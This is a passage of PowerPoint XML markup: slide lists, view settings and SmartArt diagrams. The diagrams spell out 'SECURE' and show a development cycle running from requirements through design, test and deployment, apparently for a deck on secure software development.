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75"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId76"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="261" r:id="rId2"/>
    <p:sldId id="347" r:id="rId3"/>
    <p:sldId id="279" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="287" r:id="rId11"/>
    <p:sldId id="288" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="295" r:id="rId18"/>
    <p:sldId id="296" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="333" r:id="rId21"/>
    <p:sldId id="328" r:id="rId22"/>
    <p:sldId id="329" r:id="rId23"/>
    <p:sldId id="276" r:id="rId24"/>
    <p:sldId id="298" r:id="rId25"/>
    <p:sldId id="345" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="337" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="346" r:id="rId33"/>
    <p:sldId id="303" r:id="rId34"/>
    <p:sldId id="304" r:id="rId35"/>
    <p:sldId id="305" r:id="rId36"/>
    <p:sldId id="348" r:id="rId37"/>
    <p:sldId id="306" r:id="rId38"/>
    <p:sldId id="307" r:id="rId39"/>
    <p:sldId id="334" r:id="rId40"/>
    <p:sldId id="308" r:id="rId41"/>
    <p:sldId id="309" r:id="rId42"/>
    <p:sldId id="331" r:id="rId43"/>
    <p:sldId id="338" r:id="rId44"/>
    <p:sldId id="339" r:id="rId45"/>
    <p:sldId id="340" r:id="rId46"/>
    <p:sldId id="341" r:id="rId47"/>
    <p:sldId id="310" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="312" r:id="rId50"/>
    <p:sldId id="313" r:id="rId51"/>
    <p:sldId id="332" r:id="rId52"/>
    <p:sldId id="342" r:id="rId53"/>
    <p:sldId id="314" r:id="rId54"/>
    <p:sldId id="349" r:id="rId55"/>
    <p:sldId id="315" r:id="rId56"/>
    <p:sldId id="316" r:id="rId57"/>
    <p:sldId id="343" r:id="rId58"/>
    <p:sldId id="330" r:id="rId59"/>
    <p:sldId id="317" r:id="rId60"/>
    <p:sldId id="278" r:id="rId61"/>
    <p:sldId id="318" r:id="rId62"/>
    <p:sldId id="319" r:id="rId63"/>
    <p:sldId id="320" r:id="rId64"/>
    <p:sldId id="344" r:id="rId65"/>
    <p:sldId id="321" r:id="rId66"/>
    <p:sldId id="322" r:id="rId67"/>
    <p:sldId id="323" r:id="rId68"/>
    <p:sldId id="324" r:id="rId69"/>
    <p:sldId id="325" r:id="rId70"/>
    <p:sldId id="326" r:id="rId71"/>
    <p:sldId id="335" r:id="rId72"/>
    <p:sldId id="327" r:id="rId73"/>
    <p:sldId id="260"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Vorenkamp"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764"/>
    <a:srgbClr val="01A1DD"/>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6458" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="1584" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-92622"/>
    </p:cViewPr>
    <p:sldLst>
      <p:sld r:id="rId1" collapse="1"/>
      <p:sld r:id="rId2" collapse="1"/>
    </p:sldLst>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="-6327"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="205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_rels/viewProps.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32978-5580-47EA-B8E8-173B0BCF77DE}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/venn3" loCatId="relationship" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88FB58BC-FC44-433A-9A33-0DC2679C4E2C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>S</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3312AC73-C988-495B-AACF-F866A1BAA962}" type="parTrans" cxnId="{78A661E5-6F4A-4E2B-9B0A-5FE65D38C3DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFC57C86-4529-4B1B-95D8-5C18983C453A}" type="sibTrans" cxnId="{78A661E5-6F4A-4E2B-9B0A-5FE65D38C3DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DDE1C7B-7BF7-4B06-BB3E-D8BC0CC977D6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>E</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DB51097-6DC4-4B95-854E-9C74A7A74B4A}" type="parTrans" cxnId="{5C3DD674-9B61-4CEC-8921-BC9A31A915DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF23E00B-95DC-4433-80FE-D003FADBBE36}" type="sibTrans" cxnId="{5C3DD674-9B61-4CEC-8921-BC9A31A915DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABB04323-1B37-4196-99F8-14C191C83D55}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>C</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12F8906E-A73F-432E-A48E-9E5C557A99BD}" type="parTrans" cxnId="{9D8B4954-6877-4AE8-8B90-E1E0D6F1B186}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3893BC1-7AB7-4EF9-AFAB-808E2E5C8B6B}" type="sibTrans" cxnId="{9D8B4954-6877-4AE8-8B90-E1E0D6F1B186}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEB02FE7-6213-47FC-BDDF-440E0CACAA20}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>U</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B400D070-1C6E-4652-B919-F0826342957E}" type="parTrans" cxnId="{CF04B459-0A6E-46CC-AF9B-7946ED56C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E2E0C88-AB6A-47AB-9DAF-BD8ADFCF2A24}" type="sibTrans" cxnId="{CF04B459-0A6E-46CC-AF9B-7946ED56C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{203C0C95-A757-43BC-8B34-DB7AFA3C27F8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>R</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B6B3512-4DD6-4FA0-855A-F18F60BDD063}" type="parTrans" cxnId="{6828C07C-998F-4337-B8C1-EBEFE5973E37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A3EA9B3-60AE-4E90-9638-5D37E60F48EA}" type="sibTrans" cxnId="{6828C07C-998F-4337-B8C1-EBEFE5973E37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3179E7B0-F164-4433-8CFC-8566A519F139}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>E</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97A0DEE0-A60C-4BF5-9D37-638D192315EA}" type="parTrans" cxnId="{CED67C74-B454-4C05-9946-60B2C4B6622C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2848B2D-17C4-486E-B112-FC9131FABF9D}" type="sibTrans" cxnId="{CED67C74-B454-4C05-9946-60B2C4B6622C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" type="pres">
      <dgm:prSet presAssocID="{99332978-5580-47EA-B8E8-173B0BCF77DE}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{714DD6B7-E5C1-4DC2-8205-71D397842FC2}" type="pres">
      <dgm:prSet presAssocID="{88FB58BC-FC44-433A-9A33-0DC2679C4E2C}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{541872AD-CA60-4993-9BD6-7564AE7E01C2}" type="pres">
      <dgm:prSet presAssocID="{EFC57C86-4529-4B1B-95D8-5C18983C453A}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1E63991-659F-4D2A-8923-73D16D00DC26}" type="pres">
      <dgm:prSet presAssocID="{0DDE1C7B-7BF7-4B06-BB3E-D8BC0CC977D6}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9AB4A43-F6D1-4209-8721-0F021F7BBE3D}" type="pres">
      <dgm:prSet presAssocID="{CF23E00B-95DC-4433-80FE-D003FADBBE36}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6390F78C-2315-4234-8AD1-FCAD6E2E0040}" type="pres">
      <dgm:prSet presAssocID="{ABB04323-1B37-4196-99F8-14C191C83D55}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F875B80C-CBCA-4D94-A8B1-A12940CFBFB7}" type="pres">
      <dgm:prSet presAssocID="{D3893BC1-7AB7-4EF9-AFAB-808E2E5C8B6B}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{209E93DE-584F-44D4-A3C7-54FFA34A4F70}" type="pres">
      <dgm:prSet presAssocID="{DEB02FE7-6213-47FC-BDDF-440E0CACAA20}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D16269A-92BD-4944-B8A6-9995C7796D28}" type="pres">
      <dgm:prSet presAssocID="{8E2E0C88-AB6A-47AB-9DAF-BD8ADFCF2A24}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBA9B9AB-A341-4635-A8C8-F0A81EF7CB23}" type="pres">
      <dgm:prSet presAssocID="{203C0C95-A757-43BC-8B34-DB7AFA3C27F8}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56DC73C2-D592-43FB-BA74-AA6AF094C66C}" type="pres">
      <dgm:prSet presAssocID="{5A3EA9B3-60AE-4E90-9638-5D37E60F48EA}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29B9FA2B-3FD7-4E0C-B7C5-28012D3B15D7}" type="pres">
      <dgm:prSet presAssocID="{3179E7B0-F164-4433-8CFC-8566A519F139}" presName="Name5" presStyleLbl="vennNode1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{DD7D9E0A-1000-4E37-AEE7-127EB21C5B20}" type="presOf" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{17FD7D14-D9A6-4970-8797-C6A4D8EE3389}" type="presOf" srcId="{DEB02FE7-6213-47FC-BDDF-440E0CACAA20}" destId="{209E93DE-584F-44D4-A3C7-54FFA34A4F70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{C7DEE04B-A10A-4894-846D-715D94CF90B5}" type="presOf" srcId="{3179E7B0-F164-4433-8CFC-8566A519F139}" destId="{29B9FA2B-3FD7-4E0C-B7C5-28012D3B15D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{D460FB6E-307F-40A0-BAD3-299468D3C024}" type="presOf" srcId="{88FB58BC-FC44-433A-9A33-0DC2679C4E2C}" destId="{714DD6B7-E5C1-4DC2-8205-71D397842FC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{9D8B4954-6877-4AE8-8B90-E1E0D6F1B186}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{ABB04323-1B37-4196-99F8-14C191C83D55}" srcOrd="2" destOrd="0" parTransId="{12F8906E-A73F-432E-A48E-9E5C557A99BD}" sibTransId="{D3893BC1-7AB7-4EF9-AFAB-808E2E5C8B6B}"/>
    <dgm:cxn modelId="{CED67C74-B454-4C05-9946-60B2C4B6622C}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{3179E7B0-F164-4433-8CFC-8566A519F139}" srcOrd="5" destOrd="0" parTransId="{97A0DEE0-A60C-4BF5-9D37-638D192315EA}" sibTransId="{B2848B2D-17C4-486E-B112-FC9131FABF9D}"/>
    <dgm:cxn modelId="{5C3DD674-9B61-4CEC-8921-BC9A31A915DA}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{0DDE1C7B-7BF7-4B06-BB3E-D8BC0CC977D6}" srcOrd="1" destOrd="0" parTransId="{5DB51097-6DC4-4B95-854E-9C74A7A74B4A}" sibTransId="{CF23E00B-95DC-4433-80FE-D003FADBBE36}"/>
    <dgm:cxn modelId="{5D3ABE77-9374-4BD3-9665-2EEEB8C8E2A8}" type="presOf" srcId="{0DDE1C7B-7BF7-4B06-BB3E-D8BC0CC977D6}" destId="{B1E63991-659F-4D2A-8923-73D16D00DC26}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{DF7F3179-A3F7-4F6E-A917-DEB3E172BAFC}" type="presOf" srcId="{203C0C95-A757-43BC-8B34-DB7AFA3C27F8}" destId="{FBA9B9AB-A341-4635-A8C8-F0A81EF7CB23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{CF04B459-0A6E-46CC-AF9B-7946ED56C67F}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{DEB02FE7-6213-47FC-BDDF-440E0CACAA20}" srcOrd="3" destOrd="0" parTransId="{B400D070-1C6E-4652-B919-F0826342957E}" sibTransId="{8E2E0C88-AB6A-47AB-9DAF-BD8ADFCF2A24}"/>
    <dgm:cxn modelId="{6828C07C-998F-4337-B8C1-EBEFE5973E37}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{203C0C95-A757-43BC-8B34-DB7AFA3C27F8}" srcOrd="4" destOrd="0" parTransId="{4B6B3512-4DD6-4FA0-855A-F18F60BDD063}" sibTransId="{5A3EA9B3-60AE-4E90-9638-5D37E60F48EA}"/>
    <dgm:cxn modelId="{78A661E5-6F4A-4E2B-9B0A-5FE65D38C3DD}" srcId="{99332978-5580-47EA-B8E8-173B0BCF77DE}" destId="{88FB58BC-FC44-433A-9A33-0DC2679C4E2C}" srcOrd="0" destOrd="0" parTransId="{3312AC73-C988-495B-AACF-F866A1BAA962}" sibTransId="{EFC57C86-4529-4B1B-95D8-5C18983C453A}"/>
    <dgm:cxn modelId="{60056FF9-563B-4DD8-A70E-DF7C34E454B5}" type="presOf" srcId="{ABB04323-1B37-4196-99F8-14C191C83D55}" destId="{6390F78C-2315-4234-8AD1-FCAD6E2E0040}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{06F117AD-0BF2-4B75-B051-4118447712F9}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{714DD6B7-E5C1-4DC2-8205-71D397842FC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{8B5F589B-49CC-4A5C-8B9B-392D5D5F4ABE}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{541872AD-CA60-4993-9BD6-7564AE7E01C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{BE638F26-8FBA-48B3-B020-E6F9CF3E5775}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{B1E63991-659F-4D2A-8923-73D16D00DC26}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{376613B6-4763-403F-8473-45D3CBBA3EE2}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{E9AB4A43-F6D1-4209-8721-0F021F7BBE3D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{FB349385-C4A1-4BEA-8BEF-9065BAD47339}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{6390F78C-2315-4234-8AD1-FCAD6E2E0040}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{EFBA4A30-A0D5-4A9D-BCEA-A773C8C30E49}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{F875B80C-CBCA-4D94-A8B1-A12940CFBFB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{7266674B-9F48-40D3-A7C2-D17505EDEDA2}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{209E93DE-584F-44D4-A3C7-54FFA34A4F70}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{70DA5EC0-1B38-4B0E-9653-F3E2741E422C}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{3D16269A-92BD-4944-B8A6-9995C7796D28}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{3DD4BB5A-26D7-4FB8-8D17-50B078821070}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{FBA9B9AB-A341-4635-A8C8-F0A81EF7CB23}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{A87DE699-7395-401B-82F5-6EDC90E1318E}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{56DC73C2-D592-43FB-BA74-AA6AF094C66C}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn3"/>
    <dgm:cxn modelId="{ADEE6D65-AABF-4E19-A9D6-FFF108C666AA}" type="presParOf" srcId="{2B295D11-C1B0-435C-BE31-E1982A50E8CF}" destId="{29B9FA2B-3FD7-4E0C-B7C5-28012D3B15D7}"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84893D-6F10-4985-B9F0-D2B8AE6DF98F}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8" loCatId="cycle" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d9" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr>
        <a:scene3d>
          <a:camera prst="perspectiveRelaxed" fov="0">
            <a:rot lat="19800000" lon="20400000" rev="1200000"/>
          </a:camera>
          <a:lightRig rig="soft" dir="t"/>
          <a:backdrop>
            <a:anchor x="0" y="0" z="-210000"/>
            <a:norm dx="0" dy="0" dz="914400"/>
            <a:up dx="0" dy="914400" dz="0"/>
          </a:backdrop>
        </a:scene3d>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{3E04B106-F654-4928-8E1C-A39D79953DB0}">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Architect and design</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F72CEBF0-D2AC-4440-899F-237B682511DD}" type="parTrans" cxnId="{E145B857-3646-46F8-9792-F63D2478A0EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8409C2F4-8F4D-4214-9242-83C3B76FC33D}" type="sibTrans" cxnId="{E145B857-3646-46F8-9792-F63D2478A0EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B17CFF9-D381-4461-B3FD-5FD68CDACBFD}">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Identify requirements</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C2FDB92-8ACC-464B-A21F-657EA1A0B01C}" type="parTrans" cxnId="{A8188928-B2BB-47C4-B0D1-1B19507E6955}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{423ECCEF-0BA8-492D-84E5-DBF04D86F48F}" type="sibTrans" cxnId="{A8188928-B2BB-47C4-B0D1-1B19507E6955}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FBD757F-E850-4732-A0D3-5E753691A047}">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Test</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2507A80-321B-4528-BD2F-EBA6593F62AF}" type="parTrans" cxnId="{2A26FD85-5722-4324-8A31-A0B83F84B759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CDB8A2C-88C1-4342-B602-DFE2BCA975CD}" type="sibTrans" cxnId="{2A26FD85-5722-4324-8A31-A0B83F84B759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6AE4B08-4431-4AD5-A470-E7900079FEB5}">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Deploy and maintain</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E644018F-FDB6-4B9D-B63A-96500497AE01}" type="parTrans" cxnId="{3DA8CF2C-2B6B-4975-910D-3ACCE3899854}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6BE2CDB-F308-480C-9096-1AA35E8EB69A}" type="sibTrans" cxnId="{3DA8CF2C-2B6B-4975-910D-3ACCE3899854}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
